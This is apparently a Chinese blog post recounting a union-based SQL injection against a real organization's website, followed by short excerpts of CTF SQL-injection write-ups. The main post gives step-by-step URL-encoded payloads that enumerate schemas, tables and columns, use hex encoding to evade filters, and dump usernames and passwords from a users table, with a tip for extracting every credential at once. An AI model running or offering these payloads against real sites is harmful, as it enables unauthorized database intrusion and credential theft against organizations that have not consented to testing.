簡單的SQL注入某社會組織

2021-06-27 20:19:45 字數 1439 閱讀 5290

好早之前的**了,漏洞已經被填上了,請大家不要嘗試!

目標:1、首先是拆解:show.php?id=7829 and 1=2 union select 1,2,3,4,5,6,7-- 這樣一直找到正確的列數 也可以直接用order by 後面接數,表示有多少行。這樣就可以猜到共有19行。

發現可以回顯的是3,4,13.在這些位置我們可以使用函式來回顯資料庫裡面的資料。

2、查詢資料庫和表:show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28schema_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.schemata--

出現內容如下:

3、查詢摸表中有多少項:show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.tables%20where%20table_schema=database%28%29--

4、查詢某一張表有哪些字段:show.php?id=7829%20and%201=2%20union%20select%201,2,database%28%29,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns%20where%20table_name=0x7573657273--

注意最後的users轉換成16進製制,繞過對字元的過濾。

5、查詢每乙個欄位的內容:show.php?id=7829%20and%201=2%20union%20select%201,2,passwd,name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20users

當讓這樣只是得到乙個資料而已,如果想要將所有使用者名稱密碼都爆出,群裡面的一位女士給出的答案:用group_concat(name),group_concat(passwd)。這樣就可以回顯了。

CTF Web簡單的SQL注入

慢慢開始做ctf吧。題目鏈結 我的解題過程 題目就是sql注入,先嘗試簡單的sql注入方式 一般的sql語句是 sql select from where 字段 常規注入 t or 1 1 t or 1 1 輸進去有了輸出,但沒有我們需要的flag mysql中所有表都存在information s...

簡單的sql注入1

題目 開啟題目 先隨便輸了些數字,發現只有1 2 3查詢結果 接下來進行第一步測試 輸入乙個帶單引號的資料,目的是測試是否存在注入點,輸入1 發現報錯,說明此處存在注入點。且後台 應該是一般的seletc語句,可以通過開閉合單引號來進行注入。輸入1 and 1 1發現id後顯示1 1 1說明存在過濾...

簡單的sql注入3

仍然1 1 1 發現1 報錯了。我覺得作者對 情有獨鍾 再試試1 1 1 發現都可以正常登入 試試1 and 1 1和1 and 1 2發現成功登入和不成功登入的區別在於顯示hello不,這裡並不會輸出 id name 所以這裡應該是個報錯型盲注 所以這裡就不浪費時間了,直接使用sqlmap 使用s...